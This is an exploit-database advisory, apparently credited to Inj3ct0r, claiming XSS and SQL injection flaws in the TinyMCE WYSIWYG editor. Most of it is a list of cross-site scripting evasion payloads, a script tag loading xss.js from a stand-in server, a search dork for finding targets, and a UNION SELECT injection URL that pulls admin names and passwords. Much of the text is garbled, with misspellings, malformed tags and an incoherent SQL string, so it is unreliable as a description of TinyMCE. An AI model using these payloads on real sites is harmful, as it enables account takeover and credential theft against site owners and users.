TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility

2010-02-07 / 2010-02-08
Credit: Inj3ct0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=================================================================== TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility =================================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com [+] Vurnerebility: *Js tiny_mce/tiny_mce WYSIWYG{java script} vurnerebility xss-->popup *& SQl implemented [+] Language : Java--,Xml [+] lisences : LGPL [+] Vendor : Moxiecode Systems AB [+] support : IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02; [+] vendor : http://tinymce.moxiecode.com/ [+] implemented : joomla componen,drupal.. [+] dork : powered:powered by CMS : inurl"file_manager.php?type=img" ------------------------------------------------------------------------------------ --[Vulnerability sampling]-- ------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------- # alert(String.fromCharCode(X1,X2,X3,X4))//";alert(String.fromCharCode(X1,X2,X3,x4))//\"; alert(String.fromCharCode(X1,X2,X3,x4))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(X1,X2,X3,x4))</SCRIPT> # ------------------------------------------------------------------------------------------------------------------------- # '';!--"<XSS>=&{()}' ------------------------------------------------------------------------------------ <script SRC=http//:server.com/xss.js></put_SCRIPT> <a hreef="http://www.server://www.server.com/server.com/">put_code</a> <a href="http://www.server.com./">put_code</a> <marquee>http://server.net">put_code</marquee> <a href="//srver.net">put_code</A> <a href="http://0x1x.01x0061.0x6/">put_code</a> ------------------------------------------------------------------------------------ [Thread img src] "<img src=javascript:alert(&quot;XSS&quot;)>" "<img src="javascript:alert('Put_script');"> [or] <IMG SRC=javascript:alert('put_Script')>" "<IMG SRC=javascript:alert(String.fromCharCode(X1,X2,X3,X4))>" "<img src=`javascript:alert("put_xss")`>" "<IMG SRC="jav ascript:alert('XSS');">" <IMG SRC = " write javascript vertikal position exmpl: j s : a l e r t ( ' put code vertical position ' ) ) ; > "<IMG SRC=&#1;&#2;&#3;&#4;&#5;&#6;&#7;>" try conversion---->use RainbowText from <IMG SRC=&#1;&#2;&#3;&#3> make compilign: <font color="#ff0000">&lt;</font><font color="#ff4200">I</font><font color="#ff8500">M</font><font color="#ffc700">G</font> <font color="#f3ff00">S</font><font color="#b1ff00">R</font><font color="#6eff00">C</font><font color="#2cff00">=</font><font color="#00ff16">&amp;</font><font color="#00ff58">#</font><font color="#00ff9b">1</font><font color="#00ffdd">;</font><font color="#00ddff">&amp;</font><font color="#009bff">#</font><font color="#0058ff">2</font><font color="#0016ff">;</font><font color="#2c00ff">&amp;</font><font color="#6e00ff">#</font><font color="#b100ff">3</font><font color="#f300ff">;</font><font color="#ff00c7">&amp;</font><font color="#ff0085">#</font><font color="#ff0042">3</font><font color="#ff0000">&gt;</font> ------------------------------------------------------------------------------------------------------------------------------------------------------------- SQL implemented:Injection vulnerability---->installed on c-panel(joomla---sampling write tabel view/editor) Exploit :server/patch/index.php?menuID=-value union select//**//users/2,3,4,5/password//**//from/2,3,4,5//,Group_CONCAT(name,CHAR(3,4,5),wachtwoord),2,3 from admin-- # ~ - [ [ : Inj3ct0r : ] ]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top